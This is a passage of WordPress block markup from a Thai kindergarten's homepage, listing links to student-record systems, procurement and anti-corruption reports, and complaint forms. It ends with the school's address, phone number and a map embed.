href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\" data-type=\"link\" data-id=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe 